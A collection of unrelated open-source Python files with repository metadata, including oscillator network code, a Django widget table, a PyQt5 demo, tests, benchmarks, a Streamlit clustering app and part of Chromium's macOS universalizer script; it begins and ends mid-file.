if ( (left_index >= 0) and (math.ceil(left_index / side_size) == node_row_index) ):
self.__create_connection(index, left_index);
if ( (right_index < self._num_osc) and (math.ceil(right_index / side_size) == node_row_index) ):
self.__create_connection(index, right_index);
def __create_grid_eight_connections(self):
"""!
@brief Creates network with connections that make up eight grid structure.
@details Each oscillator may be connected with eight neighbors in line with grid structure: right, right-upper, upper, upper-left, left, left-lower, lower, lower-right.
"""
self.__create_grid_four_connections(); # create connection with right, upper, left, lower.
side_size = self.__width;
for index in range(0, self._num_osc, 1):
upper_left_index = index - side_size - 1;
upper_right_index = index - side_size + 1;
lower_left_index = index + side_size - 1;
lower_right_index = index + side_size + 1;
node_row_index = math.floor(index / side_size);
upper_row_index = node_row_index - 1;
lower_row_index = node_row_index + 1;
if ( (upper_left_index >= 0) and (math.floor(upper_left_index / side_size) == upper_row_index) ):
self.__create_connection(index, upper_left_index);
if ( (upper_right_index >= 0) and (math.floor(upper_right_index / side_size) == upper_row_index) ):
self.__create_connection(index, upper_right_index);
if ( (lower_left_index < self._num_osc) and (math.floor(lower_left_index / side_size) == lower_row_index) ):
self.__create_connection(index, lower_left_index);
if ( (lower_right_index < self._num_osc) and (math.floor(lower_right_index / side_size) == lower_row_index) ):
self.__create_connection(index, lower_right_index);
def __create_list_bidir_connections(self):
"""!
@brief Creates network as bidirectional list.
@details Each oscillator may be conneted with two neighbors in line with classical list structure: right, left.
"""
if (self._conn_represent == conn_represent.MATRIX):
for index in range(0, self._num_osc, 1):
self._osc_conn.append([0] * self._num_osc);
self._osc_conn[index][index] = False;
if (index > 0):
self._osc_conn[index][index - 1] = True;
if (index < (self._num_osc - 1)):
self._osc_conn[index][index + 1] = True;
elif (self._conn_represent == conn_represent.LIST):
for index in range(self._num_osc):
self._osc_conn.append([]);
if (index > 0):
self._osc_conn[index].append(index - 1);
if (index < (self._num_osc - 1)):
self._osc_conn[index].append(index + 1);
def __create_none_connections(self):
"""!
@brief Creates network without connections.
"""
if (self._conn_represent == conn_represent.MATRIX):
for _ in range(0, self._num_osc, 1):
self._osc_conn.append([False] * self._num_osc);
elif (self._conn_represent == conn_represent.LIST):
self._osc_conn = [[] for _ in range(0, self._num_osc, 1)];
def __create_dynamic_connection(self):
"""!
@brief Prepare storage for dynamic connections.
"""
if (self._conn_represent == conn_represent.MATRIX):
for _ in range(0, self._num_osc, 1):
self._osc_conn.append([False] * self._num_osc);
elif (self._conn_represent == conn_represent.LIST):
self._osc_conn = [[] for _ in range(0, self._num_osc, 1)];
def _create_structure(self, type_conn = conn_type.ALL_TO_ALL):
"""!
@brief Creates connection in line with representation of matrix connections [NunOsc x NumOsc].
@param[in] type_conn (conn_type): Connection type (all-to-all, bidirectional list, grid structure, etc.) that is used by the network.
"""
self._osc_conn = list();
if (type_conn == conn_type.NONE):
self.__create_none_connections();
elif (type_conn == conn_type.ALL_TO_ALL):
self.__create_all_to_all_connections();
elif (type_conn == conn_type.GRID_FOUR):
self.__create_grid_four_connections();
elif (type_conn == conn_type.GRID_EIGHT):
self.__create_grid_eight_connections();
elif (type_conn == conn_type.LIST_BIDIR):
self.__create_list_bidir_connections();
elif (type_conn == conn_type.DYNAMIC):
self.__create_dynamic_connection();
else:
raise NameError('The unknown type of connections');
def has_connection(self, i, j):
"""!
@brief Returns True if there is connection between i and j oscillators and False - if connection doesn't exist.
@param[in] i (uint): index of an oscillator in the network.
@param[in] j (uint): index of an oscillator in the network.
"""
if (self._conn_represent == conn_represent.MATRIX):
return (self._osc_conn[i][j]);
elif (self._conn_represent == conn_represent.LIST):
for neigh_index in range(0, len(self._osc_conn[i]), 1):
if (self._osc_conn[i][neigh_index] == j):
return True;
return False;
else:
raise NameError("Unknown type of representation of coupling");
def set_connection(self, i, j):
"""!
@brief Couples two specified oscillators in the network with dynamic connections.
@param[in] i (uint): index of an oscillator that should be coupled with oscillator 'j' in the network.
@param[in] j (uint): index of an oscillator that should be coupled with oscillator 'i' in the network.
@note This method can be used only in case of DYNAMIC connections, otherwise it throws expection.
"""
if (self.structure != conn_type.DYNAMIC):
raise NameError("Connection between oscillators can be changed only in case of dynamic type.");
if (self._conn_represent == conn_represent.MATRIX):
self._osc_conn[i][j] = True;
self._osc_conn[j][i] = True;
else:
self._osc_conn[i].append(j);
self._osc_conn[j].append(i);
def get_neighbors(self, index):
"""!
@brief Finds neighbors of the oscillator with specified index.
@param[in] index (uint): index of oscillator for which neighbors should be found in the network.
@return (list) Indexes of neighbors of the specified oscillator.
"""
if (self._conn_represent == conn_represent.LIST):
return self._osc_conn[index]; # connections are represented by list.
elif (self._conn_represent == conn_represent.MATRIX):
return [neigh_index for neigh_index in range(self._num_osc) if self._osc_conn[index][neigh_index] == True];
else:
raise NameError("Unknown type of representation of connections");
|
leonardo/module/web/widgets/tables.py | timgates42/django-leonardo | 102 | 12770980 |
import floppyforms as forms
from django.forms.models import modelformset_factory
from django.utils.translation import ugettext_lazy as _
from horizon import tables
from horizon.tables.formset import FormsetDataTable, FormsetRow
from leonardo.module.web.models import WidgetDimension
class Slider(forms.RangeInput):
min = 1
max = 12
step = 1
template_name = 'floppyforms/slider.html'
class OffsetSlider(Slider):
min = 0
class HeightSlider(OffsetSlider):
max = 24
class WidgetDimensionForm(forms.ModelForm):
width = forms.CharField(widget=Slider(), initial=12)
height = forms.CharField(widget=HeightSlider(), initial=0)
offset = forms.CharField(widget=OffsetSlider(), initial=0)
def __init__(self, *args, **kw):
super(WidgetDimensionForm, self).__init__(*args, **kw)
self.fields['size'].initial = 'xs'
class Meta:
model = WidgetDimension
exclude = tuple()
WidgetDimensionFormset = modelformset_factory(
WidgetDimension, form=WidgetDimensionForm, can_delete=True, extra=1)
class CustomFormsetRow(FormsetRow):
def __init__(self, column, datum, form):
self.form = form
super(CustomFormsetRow, self).__init__(column, datum, form)
# add initial
if not datum and column.data:
try:
previous = column.data[0]
self.form.fields['widget_type'].initial = previous.widget_type
self.form.fields['widget_id'].initial = previous.widget_id
self.form.fields['id'].initial = previous.id + 1
except Exception:
pass
class WidgetDimensionTable(FormsetDataTable):
formset_class = WidgetDimensionFormset
def get_formset(self):
"""Provide the formset corresponding to this DataTable.
Use this to validate the formset and to get the submitted data back.
"""
if self.widget:
queryset = self.widget.dimensions
else:
queryset = WidgetDimension.objects.none()
if self._formset is None:
self._formset = self.formset_class(
self.request.POST or None,
initial=self._get_formset_data(),
prefix=self._meta.name,
queryset=queryset)
return self._formset
def __init__(self, *args, **kwargs):
self._meta.row_class = CustomFormsetRow
self.widget = kwargs.pop('widget', None)
super(WidgetDimensionTable, self).__init__(*args, **kwargs)
widget_id = tables.Column('widget_id', hidden=True)
widget_type = tables.Column('widget_type', hidden=True)
size = tables.Column('size', verbose_name=_('Size'))
width = tables.Column('width', verbose_name=('Width'))
height = tables.Column('height', verbose_name=_('Height'))
offset = tables.Column('offset', verbose_name=_('Offset'))
name = 'dimensions'
class Meta:
name = 'dimensions'
table_name = 'Dimensions'
|
qt__pyqt__pyside__pyqode/pyqt5__QComboBox.py | DazEB2/SimplePyScripts | 117 | 12771000 | <reponame>DazEB2/SimplePyScripts<filename>qt__pyqt__pyside__pyqode/pyqt5__QComboBox.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from PyQt5.Qt import *
class MainWindow(QWidget):
def __init__(self):
super().__init__()
self.tb_result = QTextBrowser()
self.cb_pets = QComboBox()
self.cb_pets.currentIndexChanged.connect(self._on_pet_changed)
self.cb_pets.addItem('Собаки', userData='dogs')
self.cb_pets.addItem('Коты', userData='cats')
layout = QVBoxLayout()
layout.addWidget(self.cb_pets)
layout.addWidget(self.tb_result)
self.setLayout(layout)
def _on_pet_changed(self, index):
# print(index) # 0
# print(self.cb_pets.itemText(index)) # Собаки
# print(self.cb_pets.itemData(index)) # dogs
# print()
# print(self.cb_pets.currentIndex()) # 0
# print(self.cb_pets.currentText()) # Собаки
# print(self.cb_pets.currentData()) # dogs
data = self.cb_pets.itemData(index)
if data == 'cats':
text = "Вы любите кошек"
elif data == 'dogs':
text = "Вы любите собак"
else:
text = ''
self.tb_result.setHtml(text)
if __name__ == '__main__':
app = QApplication([])
mw = MainWindow()
mw.show()
app.exec()
|
mne/viz/tests/test_figure.py | stevemats/mne-python | 1,953 | 12771029 | # Authors: <NAME> <<EMAIL>>
#
# License: Simplified BSD
import pytest
from mne.viz._mpl_figure import _psd_figure
from mne.viz._figure import _get_browser
def test_browse_figure_constructor():
"""Test error handling in MNEBrowseFigure constructor."""
with pytest.raises(TypeError, match='an instance of Raw, Epochs, or ICA'):
_get_browser(inst='foo')
def test_psd_figure_constructor():
"""Test error handling in MNELineFigure constructor."""
with pytest.raises(TypeError, match='an instance of Raw or Epochs, got'):
_psd_figure('foo', *((None,) * 20))
|
alphamind/benchmarks/data/winsorize.py | rongliang-tech/alpha-mind | 186 | 12771041 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
"""
Created on 2017-4-25
@author: cheng.li
"""
import datetime as dt
import numpy as np
import pandas as pd
from alphamind.data.winsorize import winsorize_normal
def benchmark_winsorize_normal(n_samples: int, n_features: int, n_loops: int) -> None:
print("-" * 60)
print("Starting winsorize normal benchmarking")
print("Parameters(n_samples: {0}, n_features: {1}, n_loops: {2})".format(n_samples, n_features,
n_loops))
num_stds = 2
x = np.random.randn(n_samples, n_features)
start = dt.datetime.now()
for _ in range(n_loops):
_ = winsorize_normal(x, num_stds)
impl_model_time = dt.datetime.now() - start
print('{0:20s}: {1}'.format('Implemented model', impl_model_time))
def impl(x):
std_values = x.std(axis=0)
mean_value = x.mean(axis=0)
lower_bound = mean_value - num_stds * std_values
upper_bound = mean_value + num_stds * std_values
res = np.where(x > upper_bound, upper_bound, x)
res = np.where(res < lower_bound, lower_bound, res)
return res
start = dt.datetime.now()
for _ in range(n_loops):
_ = impl(x)
benchmark_model_time = dt.datetime.now() - start
print('{0:20s}: {1}'.format('Benchmark model', benchmark_model_time))
def benchmark_winsorize_normal_with_group(n_samples: int, n_features: int, n_loops: int,
n_groups: int) -> None:
print("-" * 60)
print("Starting winsorize normal with group-by values benchmarking")
print(
"Parameters(n_samples: {0}, n_features: {1}, n_loops: {2}, n_groups: {3})".format(n_samples,
n_features,
n_loops,
n_groups))
num_stds = 2
x = np.random.randn(n_samples, n_features)
groups = np.random.randint(n_groups, size=n_samples)
start = dt.datetime.now()
for _ in range(n_loops):
_ = winsorize_normal(x, num_stds, groups=groups)
impl_model_time = dt.datetime.now() - start
print('{0:20s}: {1}'.format('Implemented model', impl_model_time))
def impl(x):
std_values = x.std(axis=0)
mean_value = x.mean(axis=0)
lower_bound = mean_value - num_stds * std_values
upper_bound = mean_value + num_stds * std_values
res = np.where(x > upper_bound, upper_bound, x)
res = np.where(res < lower_bound, lower_bound, res)
return res
start = dt.datetime.now()
for _ in range(n_loops):
_ = pd.DataFrame(x).groupby(groups).transform(impl)
benchmark_model_time = dt.datetime.now() - start
print('{0:20s}: {1}'.format('Benchmark model', benchmark_model_time))
if __name__ == '__main__':
benchmark_winsorize_normal(3000, 10, 1000)
benchmark_winsorize_normal_with_group(3000, 10, 1000, 30)
|
examples/00-mapdl-examples/contact_elements.py | RGPATCHI/pymapdl | 194 | 12771047 | """
.. _ref_contact_example:
Contact Element Example
~~~~~~~~~~~~~~~~~~~~~~~
This example demonstrates how to create contact elements for general
contact.
Begin by launching MAPDL.
"""
from ansys.mapdl import core as pymapdl
mapdl = pymapdl.launch_mapdl()
###############################################################################
# Enter the pre-processor, create a block and mesh it with tetrahedral
# elements.
#
mapdl.prep7()
vnum0 = mapdl.block(0, 1, 0, 1, 0, 0.5)
mapdl.et(1, 187)
mapdl.esize(0.1)
mapdl.vmesh(vnum0)
mapdl.eplot()
###############################################################################
# Second a volume block above the existing block and mesh it with
# quadratic hexahedral elements. Ensure that these blocks do not
# touch by starting it slightly higher than the existing block.
#
# Note how these two blocks do not touch and the mesh is non-conformal.
mapdl.esize(0.09)
mapdl.et(2, 186)
mapdl.type(2)
vnum1 = mapdl.block(0, 1, 0, 1, 0.50001, 1)
mapdl.vmesh(vnum1)
mapdl.eplot()
###############################################################################
# Select all the elements at the intersection between the two blocks
# and generate contact elements.
mapdl.nsel("s", "loc", "z", 0.5, 0.50001)
mapdl.esln("s")
output = mapdl.gcgen("NEW", splitkey="SPLIT", selopt="SELECT")
print(output)
###############################################################################
# Plot the contact element pairs. Note from the command output above
# that the section IDs are 5 and 6.
#
# Here, we plot the element mesh as a wire-frame to show that the
# contact pairs overlap.
mapdl.esel("S", "SEC", vmin=5, vmax=6)
mapdl.eplot(style="wireframe", line_width=3)
|
snapchat_problems/problem_5.py | loftwah/Daily-Coding-Problem | 129 | 12771078 | <filename>snapchat_problems/problem_5.py
"""This problem was asked by Snapchat.
You are given an array of length N, where each element i represents the number of ways
we can produce i units of change. For example, [1, 0, 1, 1, 2] would indicate that
there is only one way to make 0, 2, or 3 units, and two ways of making 4 units.
Given such an array, determine the denominations that must be in use.
In the case above, for example, there must be coins with value 2, 3, and 4.
""" |
pyringe/plugins/mod_base.py | Freezind/pyringe | 507 | 12771087 | #! /usr/bin/env python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides basic testing modes for the remote debugger."""
import abc
class DebuggingPlugin(object):
"""Superclass for all debugging plugins."""
__metaclass__ = abc.ABCMeta
def __init__(self, inferior, name):
self.name = name
self.position = None
self.inferior = inferior
super(DebuggingPlugin, self).__init__()
@abc.abstractproperty
def commands(self):
return []
|
AutoDL_sample_code_submission/at_toolkit/interface/adl_classifier.py | dianjixz/AutoDL | 1,044 | 12771103 | <reponame>dianjixz/AutoDL
import numpy as np
class AdlClassifier(object):
def init(self, class_num: int, init_params: dict):
self.class_num = class_num
self.label_map = list()
self.clf_name = None
raise NotImplementedError
def fit(self, train_examples_x: np.ndarray, train_examples_y: np.ndarray, fit_params:dict):
raise NotImplementedError
def predict_proba(self, test_examples: np.ndarray, predict_prob_params: dict) -> np.ndarray:
raise NotImplementedError
def rebuild_prob_res(self, input_label_list, orig_prob_array):
new_prob_arary = np.zeros((orig_prob_array.shape[0], self.class_num))
for i, cls in enumerate(input_label_list):
new_prob_arary[:, cls] = orig_prob_array[:, i]
empty_cls_list = list()
for i in range(self.class_num):
if i not in input_label_list:
empty_cls_list.append(i)
for sample_i in range(orig_prob_array.shape[0]):
np_median_value = np.median(new_prob_arary[sample_i])
for empty_cls in empty_cls_list:
new_prob_arary[sample_i][empty_cls] = np_median_value
return new_prob_arary
class AdlOfflineClassifier(AdlClassifier):
def offline_fit(self, train_examples_x: np.ndarray, train_examples_y: np.ndarray, fit_params:dict):
raise NotImplementedError
class AdlOnlineClassifier(AdlClassifier):
def online_fit(self, train_examples_x: np.ndarray, train_examples_y: np.ndarray, fit_params:dict):
raise NotImplementedError
|
rasalit/apps/nlucluster/app.py | omidforoqi/rasalit | 261 | 12771105 | <reponame>omidforoqi/rasalit<gh_stars>100-1000
import os
import pathlib
from io import StringIO
from pkg_resources import resource_filename
import streamlit as st
from whatlies.language import CountVectorLanguage
from whatlies.transformers import Pca, Umap
from whatlies import EmbeddingSet, Embedding
import sentencepiece as spm
import tensorflow as tf
import tensorflow_hub as hub
import tensorflow.compat.v1 as tf # noqa: F811
tf.disable_v2_behavior()
with tf.Session() as sess:
module = hub.Module("https://tfhub.dev/google/universal-sentence-encoder-lite/1")
spm_path = sess.run(module(signature="spm_path"))
sp = spm.SentencePieceProcessor()
sp.Load(spm_path)
input_placeholder = tf.sparse_placeholder(tf.int64, shape=[None, None])
encodings = module(
inputs=dict(
values=input_placeholder.values,
indices=input_placeholder.indices,
dense_shape=input_placeholder.dense_shape,
)
)
def process_to_IDs_in_sparse_format(sp, sentences):
ids = [sp.EncodeAsIds(x) for x in sentences]
max_len = max(len(x) for x in ids)
dense_shape = (len(ids), max_len)
values = [item for sublist in ids for item in sublist]
indices = [[row, col] for row in range(len(ids)) for col in range(len(ids[row]))]
return values, indices, dense_shape
def calculate_embeddings(messages, encodings):
values, indices, dense_shape = process_to_IDs_in_sparse_format(sp, messages)
with tf.Session() as session:
session.run([tf.global_variables_initializer(), tf.tables_initializer()])
message_embeddings = session.run(
encodings,
feed_dict={
input_placeholder.values: values,
input_placeholder.indices: indices,
input_placeholder.dense_shape: dense_shape,
},
)
return message_embeddings
st.sidebar.markdown("Made with love over at [Rasa](https://rasa.com/).")
uploaded = st.sidebar.file_uploader(
"Upload a `.txt` file for clustering. Each utterance should appear on a new line."
)
if not uploaded:
filepath = resource_filename("rasalit", os.path.join("data", "nlu.md"))
txt = pathlib.Path(filepath).read_text()
texts = list(set([t for t in txt.split("\n") if len(t) > 0]))
else:
bytes_data = uploaded.read()
stringio = StringIO(bytes_data.decode("utf-8"))
string_data = stringio.read()
texts = [
t.replace(" - ", "")
for t in string_data.split("\n")
if len(t) > 0 and t[0] != "#"
]
method = st.sidebar.selectbox(
"Select Embedding Method", ["Lite Sentence Encoding", "CountVector SVD"]
)
if method == "CountVector SVD":
n_svd = st.sidebar.slider(
"Number of SVD components", min_value=2, max_value=100, step=1
)
min_ngram, max_ngram = st.sidebar.slider(
"Range of ngrams", min_value=1, max_value=5, step=1, value=(2, 3)
)
reduction_method = st.sidebar.selectbox("Reduction Method", ("Umap", "Pca"))
if reduction_method == "Umap":
n_neighbors = st.sidebar.slider(
"Number of UMAP neighbors", min_value=1, max_value=100, value=15, step=1
)
min_dist = st.sidebar.slider(
"Minimum Distance for UMAP",
min_value=0.01,
max_value=0.99,
value=0.8,
step=0.01,
)
reduction = Umap(2, n_neighbors=n_neighbors, min_dist=min_dist)
else:
reduction = Pca(2)
st.markdown("# Simple Text Clustering")
st.markdown(
"Let's say you've gotten a lot of feedback from clients on different channels. You might like to be able to distill main topics and get an overview. It might even inspire some intents that will be used in a virtual assistant!"
)
st.markdown(
"This tool will help you discover them. This app will attempt to cluster whatever text you give it. The chart will try to clump text together and you can explore underlying patterns."
)
if method == "CountVector SVD":
lang = CountVectorLanguage(n_svd, ngram_range=(min_ngram, max_ngram))
embset = lang[texts]
if method == "Lite Sentence Encoding":
embset = EmbeddingSet(
*[
Embedding(t, v)
for t, v in zip(texts, calculate_embeddings(texts, encodings=encodings))
]
)
p = (
embset.transform(reduction)
.plot_interactive(annot=False)
.properties(width=500, height=500, title="")
)
st.write(p)
st.markdown(
"While the tool helps you in discovering clusters, it doesn't do labelling (yet). We do offer a [jupyter notebook](https://github.com/RasaHQ/rasalit/tree/master/notebooks/bulk-labelling) that might help out though."
)
|
Python/Algorithms/Sieve Algorithms/Sieve of Eratosthenes.py | m-payal/AlgorithmsAndDataStructure | 195 | 12771112 | <reponame>m-payal/AlgorithmsAndDataStructure<gh_stars>100-1000
"""
Sieve of Eratosthenes :
Generate all the primes less than any integer nn
"""
from math import sqrt
def get_primes(n):
m = n + 1
# numbers = [True for i in range(m)]
numbers = [True] * m
for i in range(2, int(sqrt(n) + 1)):
if numbers[i]:
for j in range(i * i, m, i):
numbers[j] = False
primes = []
for i in range(2, m):
if numbers[i]:
primes.append(i)
return primes
print(get_primes(25))
|
atlas/workflow/scripts/convert_jgi2vamb_coverage.py | alienzj/atlas | 204 | 12771173 | <reponame>alienzj/atlas<filename>atlas/workflow/scripts/convert_jgi2vamb_coverage.py
#!/usr/bin/env python
import os
import sys
import re
def main(jgi_file):
# parsing input
header = {}
col2keep = ["contigName", "contigLen", "totalAvgDepth"]
with open(jgi_file) as inF:
for i, line in enumerate(inF):
line = line.rstrip().split("\t")
if i == 0:
header = {x: ii for ii, x in enumerate(line)}
col2keep += [x for x in line if x.endswith(".bam")]
print("\t".join(col2keep))
continue
elif line[0] == "":
continue
# contig ID
contig = line[header["contigName"]]
# collect per-sample info
out = []
for col in col2keep:
out.append(line[header[col]])
print("\t".join(out))
if __name__ == "__main__":
if "snakemake" in globals():
with open(snakemake.log[0], "w") as log:
sys.stderr = log
with open(snakemake.output[0], "w") as outf:
sys.stdout = outf
main(snakemake.input[0])
else:
import argparse
import logging
logging.basicConfig(format="%(asctime)s - %(message)s", level=logging.DEBUG)
class CustomFormatter(
argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter
):
pass
desc = (
"Converting jgi_summarize_bam_contig_depths output to format used by VAMB"
)
epi = """DESCRIPTION:
Output format: contigName<tab>contigLen<tab>totalAvgDepth<tab>SAMPLE1.sort.bam<tab>Sample2.sort.bam<tab>...
Output written to STDOUT
"""
parser = argparse.ArgumentParser(
description=desc, epilog=epi, formatter_class=CustomFormatter
)
argparse.ArgumentDefaultsHelpFormatter
parser.add_argument(
"jgi_file",
metavar="jgi_file",
type=str,
help="jgi_summarize_bam_contig_depths output table",
)
parser.add_argument("--version", action="version", version="0.0.1")
args = parser.parse_args()
main(args.jgi_file)
|
tests/pipeline_runners/pipeline_runner_utils_test.py | elifesciences/sciencebeam | 272 | 12771207 | <gh_stars>100-1000
from unittest.mock import patch, MagicMock
import pytest
import sciencebeam.pipeline_runners.pipeline_runner_utils as pipeline_runner_utils_module
from sciencebeam.pipeline_runners.pipeline_runner_utils import (
get_remaining_file_list_for_args
)
BASE_TEST_PATH = '/tmp/test/conversion-pipeline'
BASE_DATA_PATH = BASE_TEST_PATH + '/data'
PDF_PATH = '*/*.pdf'
FILE_LIST_PATH = 'file-list.csv'
FILE_COLUMN = 'column1'
REL_PDF_FILE_WITHOUT_EXT_1 = '1/file'
PDF_FILE_1 = BASE_DATA_PATH + '/' + REL_PDF_FILE_WITHOUT_EXT_1 + '.pdf'
OUTPUT_PATH = BASE_TEST_PATH + '/out'
OUTPUT_SUFFIX = '.xml'
@pytest.fixture(name='load_file_list_mock', autouse=True)
def _load_file_list_mock():
with patch.object(pipeline_runner_utils_module, 'load_file_list') as mock:
yield mock
@pytest.fixture(name='find_matching_filenames_with_limit_mock', autouse=True)
def _find_matching_filenames_with_limit_mock():
with patch.object(pipeline_runner_utils_module, 'find_matching_filenames_with_limit') as mock:
yield mock
@pytest.fixture(name='map_file_list_to_file_exists_mock', autouse=True)
def _map_file_list_to_file_exists_mock():
with patch.object(pipeline_runner_utils_module, 'map_file_list_to_file_exists') as mock:
mock.side_effect = lambda file_list: [False] * len(file_list)
yield mock
@pytest.fixture(name='args')
def get_default_args():
opt = MagicMock()
opt.base_data_path = BASE_DATA_PATH
opt.output_path = OUTPUT_PATH
opt.output_suffix = OUTPUT_SUFFIX
opt.limit = None
return opt
@pytest.fixture(name='file_path_args')
def get_file_path_args(args):
opt = args
opt.source_path = PDF_PATH
opt.source_file_list = None
return opt
@pytest.fixture(name='file_list_args')
def get_file_list_args(args):
opt = args
opt.source_path = None
opt.source_file_list = BASE_DATA_PATH + '/file-list.tsv'
opt.source_file_column = 'url'
return opt
class TestGetRemainingFileListForArgs:
def test_should_pass_file_pattern_to_find_files(
self, file_path_args,
find_matching_filenames_with_limit_mock: MagicMock):
find_matching_filenames_with_limit_mock.return_value = [PDF_FILE_1]
assert (
get_remaining_file_list_for_args(file_path_args)
== find_matching_filenames_with_limit_mock.return_value
)
find_matching_filenames_with_limit_mock.assert_called_with(
BASE_DATA_PATH + '/' + PDF_PATH,
limit=file_path_args.limit
)
def test_should_pass_file_list_and_limit_to_load_file_list(
self, file_list_args,
load_file_list_mock: MagicMock):
opt = file_list_args
opt.limit = 100
load_file_list_mock.return_value = [PDF_FILE_1]
assert (
get_remaining_file_list_for_args(opt)
== load_file_list_mock.return_value
)
load_file_list_mock.assert_called_with(
opt.source_file_list, column=opt.source_file_column, limit=opt.limit
)
|
setup.py | asmiyusau/ShazamIO | 111 | 12771214 | import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="shazamio",
version="0.0.5",
author="dotX12",
description="Is a FREE asynchronous library from reverse engineered Shazam API written in Python 3.6+ with asyncio and aiohttp. Includes all the methods that Shazam has, including searching for a song by file.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/dotX12/ShazamIO",
install_requires=['aiohttp', 'pydub', 'numpy', 'aiofiles', 'dataclass-factory',],
packages=setuptools.find_packages(),
python_requires='>=3.6',
)
|
chrome/installer/mac/universalizer.py | zealoussnow/chromium | 14,668 | 12771215 | #!/usr/bin/env python
# coding: utf-8
# Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import errno
import filecmp
import os
import plistlib
import shutil
import stat
import subprocess
import sys
import time
def _stat_or_none(path, root):
"""Calls os.stat or os.lstat to obtain information about a path.
This program traverses parallel directory trees, which may have subtle
differences such as directory entries that are present in fewer than all
trees. It also operates on symbolic links directly, instead of on their
targets.
Args:
path: The path to call os.stat or os.lstat on.
root: True if called on the root of a tree to be merged, False
otherwise. See the discussion below.
Returns:
The return value of os.stat or os.lstat, or possibly None if the path
does not exist.
When root is True, indicating that path is at the root of one of these
trees, this permissiveness is disabled, as all roots are required to be
present. If one is absent, an exception will be raised. When root is True,
os.stat will be used, as this is the one case when it is desirable to
operate on a symbolic link’s target.
When root is False, os.lstat will be used to operate on symbolic links
directly, and a missing path will cause None to be returned.
"""
if root:
return os.stat(path)
try:
return os.lstat(path)
except OSError as e:
if e.errno == errno.ENOENT:
return None
raise
def _file_type_for_stat(st):
"""Returns a string indicating the type of directory entry in st.
Args:
st: The return value of os.stat or os.lstat.
Returns:
'symbolic link', 'file', or 'directory'.
"""
if stat.S_ISLNK(st.st_mode):
return 'symbolic_link'
if stat.S_ISREG(st.st_mode):
return 'file'
if stat.S_ISDIR(st.st_mode):
return 'directory'
raise Exception('unknown file type for mode 0o%o' % mode)
def _sole_list_element(l, exception_message):
"""Assures that every element in a list is identical.
Args:
l: The list to consider.
exception_message: A message used to convey failure if every element in
l is not identical.
Returns:
The value of each identical element in the list.
"""
s = set(l)
if len(s) != 1:
raise Exception(exception_message)
return l[0]
def _read_plist(path):
"""Reads a macOS property list, API compatibility adapter."""
with open(path, 'rb') as file:
try:
# New API, available since Python 3.4.
return plistlib.load(file)
except AttributeError:
# Old API, available (but deprecated) until Python 3.9.
return plistlib.readPlist(file)
def _write_plist(value, path):
"""Writes a macOS property list, API compatibility adapter."""
with open(path, 'wb') as file:
try:
# New API, available since Python 3.4.
plistlib.dump(value, file)
except AttributeError:
# Old API, available (but deprecated) until Python 3.9.
plistlib.writePlist(value, file)
class CantMergeException(Exception):
"""Raised when differences exist between input files such that they cannot
be merged successfully.
"""
pass
def _merge_info_plists(input_paths, output_path):
"""Merges multiple macOS Info.plist files.
Args:
input_plists: A list of paths containing Info.plist files to be merged.
output_plist: The path of the merged Info.plist to create.
Raises:
CantMergeException if all input_paths could not successfully be merged
into output_path.
A small number of differences are tolerated in the input Info.plists. If a
key identifying the build environment (OS or toolchain) is different in any
of the inputs, it will be removed from the output. There are valid reasons
to produce builds for different architectures using different toolchains or
SDKs, and there is no way to rationalize these differences into a single
value.
If present, the Chrome KSChannelID family of keys are rationalized by using
“universal” to identify the architecture (compared to, for example,
“arm64”.)
"""
input_plists = [_read_plist(x) for x in input_paths]
output_plist = input_plists[0]
for index in range(1, len(input_plists)):
input_plist = input_plists[index]
for key in set(input_plist.keys()) | set(output_plist.keys()):
if input_plist.get(key, None) == output_plist.get(key, None):
continue
if key in ('BuildMachineOSBuild', 'DTCompiler', 'DTPlatformBuild',
'DTPlatformName', 'DTPlatformVersion', 'DTSDKBuild',
'DTSDKName', 'DTXcode', 'DTXcodeBuild'):
if key in input_plist:
del input_plist[key]
if key in output_plist:
del output_plist[key]
elif key == 'KSChannelID' or key.startswith('KSChannelID-'):
# These keys are Chrome-specific, where it’s only present in the
# outer browser .app’s Info.plist.
#
# Ensure that the values match the expected format as a
# prerequisite to what follows.
key_tail = key[len('KSChannelID'):]
input_value = input_plist.get(key, '')
output_value = output_plist.get(key, '')
assert input_value.endswith(key_tail)
assert output_value.endswith(key_tail)
# Find the longest common trailing sequence of hyphen-separated
# elements, and use that as the trailing sequence of the new
# value.
input_parts = reversed(input_value.split('-'))
output_parts = output_value.split('-')
output_parts.reverse()
new_parts = []
for input_part, output_part in zip(input_parts, output_parts):
if input_part == output_part:
new_parts.append(output_part)
else:
break
# Prepend “universal” to the entire value if it’s not already
# there.
if len(new_parts) == 0 or new_parts[-1] != 'universal':
new_parts.append('universal')
output_plist[key] = '-'.join(reversed(new_parts))
assert output_plist[key] != ''
else:
raise CantMergeException(input_paths[index], output_path)
_write_plist(output_plist, output_path)
def _universalize(input_paths, output_path, root):
"""Merges multiple trees into a “universal” tree.
This function provides the recursive internal implementation for
universalize.
Args:
input_paths: The input directory trees to be merged.
output_path: The merged tree to produce.
root: True if operating at the root of the input and output trees.
"""
input_stats = [_stat_or_none(x, root) for x in input_paths]
for index in range(len(input_paths) - 1, -1, -1):
if input_stats[index] is None:
del input_paths[index]
del input_stats[index]
input_types = [_file_type_for_stat(x) for x in input_stats]
type = _sole_list_element(
input_types,
'varying types %r for input paths %r' % (input_types, input_paths))
if type == 'file':
identical = True
for index in range(1, len(input_paths)):
if not filecmp.cmp(input_paths[0], input_paths[index]):
identical = False
if (os.path.basename(output_path) == 'Info.plist' or
os.path.basename(output_path).endswith('-Info.plist')):
_merge_info_plists(input_paths, output_path)
else:
command = ['lipo', '-create']
command.extend(input_paths)
command.extend(['-output', output_path])
subprocess.check_call(command)
if identical:
